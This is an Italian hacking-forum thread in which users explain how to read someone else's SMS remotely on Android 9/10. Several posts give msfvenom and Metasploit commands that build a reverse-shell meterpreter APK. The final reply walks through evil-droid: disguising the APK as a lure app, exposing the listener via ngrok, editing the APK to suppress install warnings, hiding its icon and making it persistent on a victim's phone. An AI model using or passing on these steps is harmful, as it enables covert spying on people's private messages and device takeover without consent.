Risolto Leggere SMS da remoto - nuovi exploit Android 9.0 o 10?

Stato
Discussione chiusa ad ulteriori risposte.

haxo

Helper
8 Maggio 2020
107
33
53
Ciao, potresti fare una cosa del genere:

dalla shell:

msfvenom -p android/meterpreter/reverse_tcp lhost=iplocale lport=porta> shell.apk
apri metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost iplocale
set lport porta
exploit


comunque, una volta avuto accesso al telefono, tramite il comando "dump_sms" dovresti riuscire a scaricare tutti gli SMS presenti.
penso sia un metodo generale perchè si tratta di inserire un file apk all'interno del telefono, magari ci riesci con un po di ingegneria sociale e hai fatto.

attento a non metterti nei guai, ciao bello.
 

0xbro

Moderatore
24 Febbraio 2017
3,468
2,588
959
Ciao, potresti fare una cosa del genere:

dalla shell:

msfvenom -p android/meterpreter/reverse_tcp lhost=iplocale lport=porta> shell.apk
apri metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost iplocale
set lport porta
exploit


comunque, una volta avuto accesso al telefono, tramite il comando "dump_sms" dovresti riuscire a scaricare tutti gli SMS presenti.
penso sia un metodo generale perchè si tratta di inserire un file apk all'interno del telefono, magari ci riesci con un po di ingegneria sociale e hai fatto.

attento a non metterti nei guai, ciao bello.
Non credo che questa tecnica funzioni siccome l'APK che viene generato è vecchio, non rispetta più l'architettura android dalla versione 5.0 e viene individuata come app malevola in tutte le nuove versione di Android
 
Supporta Inforge con una donazione
Banner pubblicitario per Bright Data su Inforge.net azienda di vendita Proxy, Data Collector e Content Unlocker

CRYP70

Utente Iron
25 Aprile 2021
14
0
8
Ultima modifica:
Non credo che questa tecnica funzioni siccome l'APK che viene generato è vecchio, non rispetta più l'architettura android dalla versione 5.0 e viene individuata come app malevola in tutte le nuove versione di Android
Di funzionare funziona (relativamente), circa 2 settimane fa ho testato con un Huaweii, peró il cellulare ti avverte chiaramente che l’APK potrebbe essere un app spia quindi credo nemmeno con un po’ di ingegneria sociale si riesce a fare installare l’APK, a meno che la persona non sia stupida, oltre questo dopo circa 30/45 secondi la sessione muore da sola, quindi se l’obbiettivo è quello di eseguire il dump degli sms si potrebbe fare ma sempre riuscendo a far installare l’APK
 

IlMagoDeiTeoremi

Utente Bronze
30 Marzo 2021
53
13
31
Salve,

qualcuno è a conoscenza di nuovi exploit (o metodi in generale) per leggere SMS da remoto su smartphone con Android 9.0 o 10?

Grazie.
Capiti a pennello, io è da anni che mi sono incapato con un tool chiamato evil-droid che non sarebbe altro metasploit apposta per android reso più semplice e automatico, purtroppo non si possono utilizzare apk modificate come se fossero veritiere già da android 5 ma io ho provato sul mio s9 plus sia in versione android 9 che android 10 a installare l'apk maligno creato con evildroid e funzionavano quasi tutte le funzioni perfettamente anche l'invio di sms, quello che devi fare è installare evildroid da github sul tuo linux e insieme a quello tutte le dipendenze, poi ti chiederà che tipo di apk generare e dovrai selezionare icon changer che sarebbe l'apk predefinito di metasploit solo con l'icona cambiata (ti consiglio di prenderne una da internet come per esempio qualcosa che adeschi come netflix premium o cose cosi) una volta generato l'apk ovviamente scegli l'indirizzo ip a cui deve essere connesso (se ovviamente devi farlo over wifi dovresti fare port forwarding quindi o apri le porte da 192.168.1.1 del tuo modem e inserisci l'ip pubblico oppure usi ngrok che si connette al tuo ip locale e quindi nell'apk inserisci l'ip e la porta fornita da ngrok) una volta fatto tutto scaricando l'apk sul tuo android 9/10 vedrai che ti sconsiglia di installarlo perchè l'autore non e verificato, per eliminare questa avvertenza installa apk editor sul tuo android dove devi modificare l'apk e dovrai cambiare dei parametri non ricordo esattamente quali ma bastava modificare nelle impostazioni semplici ci sono due valori, 17 e 21, modifica il primo e deve risultare 21 anche lui e cosi alla vittima non uscirà l'avvertenza, una volta fatto l'apk è finito, unica pecca è quando la vittima lo va ad installare e prova ad aprirlo l'apk non si apre perchè è solo un processo in background, per questo consiglio di stare pronto con l'opzione hideiconapp in modo da nasconderla e successivamente rendere il processo persistente ovvero autoavviante con uno script shell se non ricordo male.
 
DOWNLOAD
Supporta Inforge con una donazione
Stato
Discussione chiusa ad ulteriori risposte.